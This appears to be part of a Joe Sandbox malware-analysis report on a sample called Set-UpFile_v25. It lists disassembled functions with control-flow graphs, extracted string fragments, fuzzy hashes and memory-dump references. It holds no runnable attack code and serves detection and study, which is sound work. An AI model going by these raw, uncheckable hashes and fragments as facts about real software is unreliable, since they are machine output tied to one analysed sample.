                                                                                                                                                                control_flow_graph 1315 298b2c2-298b2d0 1316 298b695-298b697 1315->1316 1317 298b2d6-298b353 call 2987972 call 2989b02 1315->1317 1319 298b755-298b761 1316->1319 1323 298b362-298b376 1317->1323 1323->1323 1324 298b378-298b3a4 call 298ab12 1323->1324 1327 298b3b2-298b3c6 1324->1327 1327->1327 1328 298b3c8-298b3f8 call 298ab12 1327->1328 1331 298b402-298b42b 1328->1331 1331->1331 1332 298b42d-298b464 call 298ab12 1331->1332 1335 298b472-298b4a9 1332->1335 1335->1335 1336 298b4ab-298b4c4 1335->1336 1337 298b4d2-298b4e6 1336->1337 1337->1337 1338 298b4e8-298b50a call 298ab12 1337->1338 1341 298b512-298b533 1338->1341 1341->1341 1342 298b535-298b605 call 298add2 1341->1342 1345 298b612-298b634 1342->1345 1345->1345 1346 298b636-298b63e 1345->1346 1347 298b640-298b648 1346->1347 1348 298b663-298b66e 1346->1348 1349 298b652-298b661 1347->1349 1350 298b69c 1348->1350 1351 298b670-298b677 1348->1351 1349->1348 1349->1349 1353 298b6a0-298b6ed 1350->1353 1352 298b682-298b691 1351->1352 1352->1352 1354 298b693 1352->1354 1355 298b6f2-298b718 1353->1355 1354->1353 1355->1355 1356 298b71a-298b74b call 298e112 call 2989b12 1355->1356 1356->1319
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !$115;$115;$5$?<$?i?$Mi?$_
                                                                                                                                                                • API String ID: 0-2532054263
                                                                                                                                                                • Opcode ID: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
                                                                                                                                                                • Instruction ID: 177120897e944fa1b5e33820c60f95995efbfb63c494b9913df8a7297d5b136f
                                                                                                                                                                • Opcode Fuzzy Hash: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
                                                                                                                                                                • Instruction Fuzzy Hash: 21B1BDB11483408BE714DF25D861B6BBBE6EFC2328F188D1DE0D18B391D779850ACB56
                                                                                                                                                                Function 029BCBC2 Relevance: 10.3, Strings: 8, Instructions: 312COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1361 29bcbc2-29bcbf4 1362 29bcbf9-29bcc07 1361->1362 1362->1362 1363 29bcc09 1362->1363 1364 29bcc0b-29bcc0e 1363->1364 1365 29bcc4a-29bcc72 1364->1365 1366 29bcc10-29bcc48 1364->1366 1367 29bcc77-29bcc85 1365->1367 1366->1364 1367->1367 1368 29bcc87 1367->1368 1369 29bcc89-29bcc8c 1368->1369 1370 29bccc8-29bcd18 1369->1370 1371 29bcc8e-29bccc6 1369->1371 1372 29bcd1a-29bcd1d 1370->1372 1371->1369 1373 29bcd5a-29bcd62 1372->1373 1374 29bcd1f-29bcd58 1372->1374 1375 29bcd68-29bcd84 1373->1375 1376 29bcfdd 1373->1376 1374->1372 1378 29bcd89-29bcd94 1375->1378 1377 29bcfdf-29bcfe1 1376->1377 1379 29bcfe7-29bcff6 1377->1379 1378->1378 1380 29bcd96 1378->1380 1381 29bcd98-29bcd9b 1380->1381 1382 29bce28-29bce30 1381->1382 1383 29bcda1-29bce23 1381->1383 1382->1376 1384 29bce36-29bce52 1382->1384 1383->1381 1385 29bce57-29bce62 1384->1385 1385->1385 1386 29bce64 1385->1386 1387 29bce66-29bce69 1386->1387 1388 29bce6f-29bceff 1387->1388 1389 29bcf04-29bcf11 1387->1389 1388->1387 1389->1376 1390 29bcf17-29bcf35 1389->1390 1392 29bcf3a-29bcf45 1390->1392 1392->1392 1393 29bcf47 1392->1393 1394 29bcf49-29bcf4c 1393->1394 1395 29bcf4e-29bcf74 1394->1395 1396 29bcf76-29bcf7e 1394->1396 1395->1394 1396->1376 1397 29bcf80-29bcf9c 1396->1397 1398 29bcfa1-29bcfac 1397->1398 1398->1398 1399 29bcfae 1398->1399 1400 29bcfb0-29bcfb3 1399->1400 1401 29bcfcc-29bcfd9 1400->1401 1402 29bcfb5-29bcfca 1400->1402 1401->1377 1403 29bcfdb-29bcfe5 1401->1403 1402->1400 1403->1379
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &$@$J$P$X$X$s$~
                                                                                                                                                                • API String ID: 0-3380057976
                                                                                                                                                                • Opcode ID: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
                                                                                                                                                                • Instruction ID: 501eddcfd185468209bf05375f13034fbbad3ee4d4934714ff058d42ac14fdcf
                                                                                                                                                                • Opcode Fuzzy Hash: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
                                                                                                                                                                • Instruction Fuzzy Hash: 57C1E272A0C7D04ED325867C884839BAFD25FD2224F1D8FAEE5E9C73D2D66988058353
                                                                                                                                                                Function 0298ADD2 Relevance: 7.9, Strings: 6, Instructions: 427COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $8ZY$@DFF$I@HS$NGKL$Q$T@AK
                                                                                                                                                                • API String ID: 0-2870219239
                                                                                                                                                                • Opcode ID: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
                                                                                                                                                                • Instruction ID: 837186e94363c02d622265abf1f8fa1fdf7c77b5fdc2ad6730841f379c4eabdd
                                                                                                                                                                • Opcode Fuzzy Hash: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
                                                                                                                                                                • Instruction Fuzzy Hash: 03D1E57250C3A18BD325DF29C86035BFFE1AF92608F0D896DE8D18B345D779850ACB92
                                                                                                                                                                Function 0298AB12 Relevance: 7.8, Strings: 6, Instructions: 263COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: % 0($/u]7$A$NN$jq${
                                                                                                                                                                • API String ID: 0-2405101777
                                                                                                                                                                • Opcode ID: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
                                                                                                                                                                • Instruction ID: 243d46b36721770c0e0f7caea1e0e213a213258cd8114a58c7098d6878d7a19f
                                                                                                                                                                • Opcode Fuzzy Hash: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
                                                                                                                                                                • Instruction Fuzzy Hash: 0C71DF7010C3828BD711DF2984507ABFFE1AF97244F1899AEE4D5DB242DB78C50AC726
                                                                                                                                                                Function 0298E6BD Relevance: 7.6, Strings: 6, Instructions: 149COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !I/K$+E-G$23,$7U0W$hi$vMnO
                                                                                                                                                                • API String ID: 0-280941541
                                                                                                                                                                • Opcode ID: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
                                                                                                                                                                • Instruction ID: 011842bf7193c890b400115dae1ad76c3b516d8e8da6a73201f2dc1f1e935638
                                                                                                                                                                • Opcode Fuzzy Hash: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
                                                                                                                                                                • Instruction Fuzzy Hash: 1941EF742093919BD7189F28C86177BB7E2FF86304F08992CE5C69B2D1E7748901CB4A
                                                                                                                                                                Function 02985AF2 Relevance: 6.7, Strings: 5, Instructions: 478COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                • API String ID: 0-3469842109
                                                                                                                                                                • Opcode ID: f9d5927079dbe5952970529c093a2cac2a039b0e73578539b20dca946c01c9b4
                                                                                                                                                                • Instruction ID: 82eb7b328bee54d7c42ab577e572bf04a8464628d3ac2cf26d657d9a1ca756c4
                                                                                                                                                                • Opcode Fuzzy Hash: f9d5927079dbe5952970529c093a2cac2a039b0e73578539b20dca946c01c9b4
                                                                                                                                                                • Instruction Fuzzy Hash: A00224B16083908FD714EF68C89076ABBE1FFD5304F4A852DE9858B391D379D908CB92
                                                                                                                                                                Function 0299BFC2 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (HyN$5D"J$8@(F$_$cPQV
                                                                                                                                                                • API String ID: 0-882278378
                                                                                                                                                                • Opcode ID: 1da3d1bc773617987d346d6c30645742576db1c4423b3220aa4f462191f88acd
                                                                                                                                                                • Instruction ID: 698176d4a2b785aa0604e8a7154ebd6ffc4debd802a13ca160a8426a8aae7b4e
                                                                                                                                                                • Opcode Fuzzy Hash: 1da3d1bc773617987d346d6c30645742576db1c4423b3220aa4f462191f88acd
                                                                                                                                                                • Instruction Fuzzy Hash: 956129152146904AEB6CDF74889373BBAE6DF85308F1891BFC895CF697E538C5038B49
                                                                                                                                                                Function 029C0F72 Relevance: 5.6, Strings: 4, Instructions: 592COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 52#0$S"(w$S"(w$f
                                                                                                                                                                • API String ID: 0-4029711564
                                                                                                                                                                • Opcode ID: ac7f2cd36c1052b6b89d37aacbe0b1ed5b07f493e73f73d69f12a8dfc485f2be
                                                                                                                                                                • Instruction ID: efb987beb6ee3478dee9baf270585de7b5726980a71eb60c9c71dd5db6568d86
                                                                                                                                                                • Opcode Fuzzy Hash: ac7f2cd36c1052b6b89d37aacbe0b1ed5b07f493e73f73d69f12a8dfc485f2be
                                                                                                                                                                • Instruction Fuzzy Hash: AB22D2716083418FD724CF18C89076ABBE5FBC4318F298A2DE4E947392D775E805CB9A
                                                                                                                                                                Function 0299DDE9 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !$4C|]$9G9A$No)i
                                                                                                                                                                • API String ID: 0-363387783
                                                                                                                                                                • Opcode ID: 99ef643c84b66f015dcbb3ba373007805ac151789093f39ec11bcd0cddd0432f
                                                                                                                                                                • Instruction ID: 76308ad50ef65418819a9881a39d8a6014f0c4938df6cabbce965b70ccc6f19e
                                                                                                                                                                • Opcode Fuzzy Hash: 99ef643c84b66f015dcbb3ba373007805ac151789093f39ec11bcd0cddd0432f
                                                                                                                                                                • Instruction Fuzzy Hash: 0D81BAB5E452089FDF10CF95E8817EEBB72EF55310F14802DE9846B241D73E490ADBA8
                                                                                                                                                                Function 029A4292 Relevance: 4.3, Strings: 3, Instructions: 509COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 1>?<$t$$-
                                                                                                                                                                • API String ID: 0-1214471300
                                                                                                                                                                • Opcode ID: eaf7fef8290ca267fd93b6873740f89e17e051e220a84919e0a7861d9221380e
                                                                                                                                                                • Instruction ID: 687d07ac901228f7e26d33eeabb5f3238b0346bb0bcfab141e076e1c27be5f5b
                                                                                                                                                                • Opcode Fuzzy Hash: eaf7fef8290ca267fd93b6873740f89e17e051e220a84919e0a7861d9221380e
                                                                                                                                                                • Instruction Fuzzy Hash: CDE1C4B16093408BD714CF68C8A1B6BBBE5FFC5314F14992DE5858B391E7B8D805CB92
                                                                                                                                                                Function 0298C8E2 Relevance: 4.1, Strings: 3, Instructions: 396COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ;$A$YqMC
                                                                                                                                                                • API String ID: 0-1057406701
                                                                                                                                                                • Opcode ID: 1d1c454c0a6ce5b526db7e6ab724aae148abac9ac88063eff11794e4b055225e
                                                                                                                                                                • Instruction ID: 7f85e4786c477189eebdad2ccd0dc3b6302106e24896709f0bbcf9711b6fb915
                                                                                                                                                                • Opcode Fuzzy Hash: 1d1c454c0a6ce5b526db7e6ab724aae148abac9ac88063eff11794e4b055225e
                                                                                                                                                                • Instruction Fuzzy Hash: F4D1E27150C3508BD328EF6894903ABFBE5AFC2704F08892EE9D56B341D775990ACB97
                                                                                                                                                                Function 0299E0FA Relevance: 4.1, Strings: 3, Instructions: 392COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !.$I"M $^2^0
                                                                                                                                                                • API String ID: 0-3146913702
                                                                                                                                                                • Opcode ID: 8ea121c802999dbd66e6baa778c838c71ddd33164dc1e7cefb047b327b046430
                                                                                                                                                                • Instruction ID: 03554a5e368ffd503da6dac2345cd7bd30e5d310c571380f8f6e6d0f974edc39
                                                                                                                                                                • Opcode Fuzzy Hash: 8ea121c802999dbd66e6baa778c838c71ddd33164dc1e7cefb047b327b046430
                                                                                                                                                                • Instruction Fuzzy Hash: FBC12A72E006158BCF14CFA8C8513AEB7B2FF94324F19812AD855AF395E7789906CB80
                                                                                                                                                                Function 0299B442 Relevance: 3.4, Strings: 2, Instructions: 880COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ?_4Y$vw
                                                                                                                                                                • API String ID: 0-1417362010
                                                                                                                                                                • Opcode ID: 3e7f3439070581799b8c254b57a5b459b80d424dd7a7b66d48476f291afa7e51
                                                                                                                                                                • Instruction ID: e865fc18e667c13153b5a8d790794d8745be77e884cac28e8834917d91d5fa39
                                                                                                                                                                • Opcode Fuzzy Hash: 3e7f3439070581799b8c254b57a5b459b80d424dd7a7b66d48476f291afa7e51
                                                                                                                                                                • Instruction Fuzzy Hash: A362D7706093419FEB24CF28D8A072BBBE6EB9532CF58862CF595572A1D378D845CF42
                                                                                                                                                                Function 0299A3F0 Relevance: 2.9, Strings: 2, Instructions: 378COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: <$Sc$e$Sc
                                                                                                                                                                • API String ID: 0-2378013606
                                                                                                                                                                • Opcode ID: 2df799a56b87b47bd72a841fe6368d8bddb431128b46daa332390f26acc1bdd8
                                                                                                                                                                • Instruction ID: dc7884a849571684e8b58c6d5a7df96b906102bcfc4fb90f8c416d2222a21734
                                                                                                                                                                • Opcode Fuzzy Hash: 2df799a56b87b47bd72a841fe6368d8bddb431128b46daa332390f26acc1bdd8
                                                                                                                                                                • Instruction Fuzzy Hash: 0AB15B729183218BC728CF29C8A136BB7E2FFC4714F19866DE8C95B351EB748941C786
                                                                                                                                                                Function 0299D955 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: *@Up$t1{@
                                                                                                                                                                • API String ID: 0-3978741162
                                                                                                                                                                • Opcode ID: 1e1b7f705bdafa5b7765d73f6c03b5c4709946098f07cdc5ab0ef7b1d18e8894
                                                                                                                                                                • Instruction ID: 00de10410988bfdaab291b772537bcc99bf3116b690c0b117959145424704e8a
                                                                                                                                                                • Opcode Fuzzy Hash: 1e1b7f705bdafa5b7765d73f6c03b5c4709946098f07cdc5ab0ef7b1d18e8894
                                                                                                                                                                • Instruction Fuzzy Hash: 04A1F3716016418BD7289F2CC8A1732F7F2FF96324B28855DD4868F791E738D842CB60
                                                                                                                                                                Function 02993CCF Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ]$q
                                                                                                                                                                • API String ID: 0-1305462013
                                                                                                                                                                • Opcode ID: f191d090da23314dc1e84534dae4727f7ffa93aaf4b673a550be93d3ca84fead
                                                                                                                                                                • Instruction ID: a6d1526ae62119255553549b291012617035cfda06cc6554a78a499e73bee78f
                                                                                                                                                                • Opcode Fuzzy Hash: f191d090da23314dc1e84534dae4727f7ffa93aaf4b673a550be93d3ca84fead
                                                                                                                                                                • Instruction Fuzzy Hash: 11818EB150C7808BD714AF3D84953AEBBE6AFC5324F188E6EE4E9873C1DA358545CB06
                                                                                                                                                                Function 02990C22 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: I$r
                                                                                                                                                                • API String ID: 0-3488194283
                                                                                                                                                                • Opcode ID: af75585ce3192d8d242df0c2d3cdfd0b33462f513dea96953d081da246ccc2ba
                                                                                                                                                                • Instruction ID: d8ddf687eb3aaea48f7987b056452f3f3e8a57204fbffd160195976b4ed40d9a
                                                                                                                                                                • Opcode Fuzzy Hash: af75585ce3192d8d242df0c2d3cdfd0b33462f513dea96953d081da246ccc2ba
                                                                                                                                                                • Instruction Fuzzy Hash: 5951C37150C7808FDB609B3C84453ABBBE5ABD6334F184EADD8E9C7282E6368445C717
                                                                                                                                                                Function 0299C4EB Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: {:;8
                                                                                                                                                                • API String ID: 0-2687946593
                                                                                                                                                                • Opcode ID: ac57bb4bbc7b0d6600352fadbb3ce6177d809d8bd4ca3efd9c8cbd54be818141
                                                                                                                                                                • Instruction ID: d072b70a73139a88fa3b08fa591c72ada514c01d16e5bd55eee024012bef6b51
                                                                                                                                                                • Opcode Fuzzy Hash: ac57bb4bbc7b0d6600352fadbb3ce6177d809d8bd4ca3efd9c8cbd54be818141
                                                                                                                                                                • Instruction Fuzzy Hash: C9F1B0B49007018FD7249F28C992722BBF1FF4A310F148A9DD4D68B796E735E456CB92
                                                                                                                                                                Function 029AA872 Relevance: 1.7, Strings: 1, Instructions: 420COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: `jkh
                                                                                                                                                                • API String ID: 0-2588032495
                                                                                                                                                                • Opcode ID: a2a3026f6d0f4f0313e12e9cba0a143dbbb993817f6c3f6514f40db79fe967bc
                                                                                                                                                                • Instruction ID: 0a3f54d3aaba64a600e3a89c8068f424099400e37a5750bbc6e6664a21b05c19
                                                                                                                                                                • Opcode Fuzzy Hash: a2a3026f6d0f4f0313e12e9cba0a143dbbb993817f6c3f6514f40db79fe967bc
                                                                                                                                                                • Instruction Fuzzy Hash: AAC1F3726493018BE714CF28C8A176BB7F6EB95314F19863DD49687381E379D80AC7D2
                                                                                                                                                                Function 029AFBD2 Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "
                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                • Opcode ID: 90663060bc370af2118ea89dfeca9a1d53cbca4ad02480e40e4f36680a0c1efd
                                                                                                                                                                • Instruction ID: 2eb1ad61bda83e3130f74b3981c1a2216d4c450f1185cb195918bf8f048fd293
                                                                                                                                                                • Opcode Fuzzy Hash: 90663060bc370af2118ea89dfeca9a1d53cbca4ad02480e40e4f36680a0c1efd
                                                                                                                                                                • Instruction Fuzzy Hash: 7AC129B2A083045BD725DF24C4A076BB7EAAFC5314F1C892DE8998B781E735D844CBD1
                                                                                                                                                                Function 029BE2C2 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: NP,?
                                                                                                                                                                • API String ID: 0-3110377521
                                                                                                                                                                • Opcode ID: a08d144955d9c906b9069473368a354a6e3d7f041b47d728d65520edf6df4dfd
                                                                                                                                                                • Instruction ID: 429e5431df5859c02308179a80abd85162f186bbb492c69ce8fbf5356d22ab21
                                                                                                                                                                • Opcode Fuzzy Hash: a08d144955d9c906b9069473368a354a6e3d7f041b47d728d65520edf6df4dfd
                                                                                                                                                                • Instruction Fuzzy Hash: C8A12571A043019BD725CF24C9C0BABB7ABEFC9318F99862CE5E917295D730D805CB82
                                                                                                                                                                Function 029A966A Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 0-3019521637
                                                                                                                                                                • Opcode ID: 7973b4c1f1e50ac0683abeaa0578d39e638ced97aaf04a4f08e1395a0d910024
                                                                                                                                                                • Instruction ID: 3703f51f50a45ac1455c1660655dc46cf182922f076b0b05089f410811996846
                                                                                                                                                                • Opcode Fuzzy Hash: 7973b4c1f1e50ac0683abeaa0578d39e638ced97aaf04a4f08e1395a0d910024
                                                                                                                                                                • Instruction Fuzzy Hash: 6EB12A71A043568FE7248F28C4B13BABBA1FF56350F098AADC4965B3C2E3349585D7D1
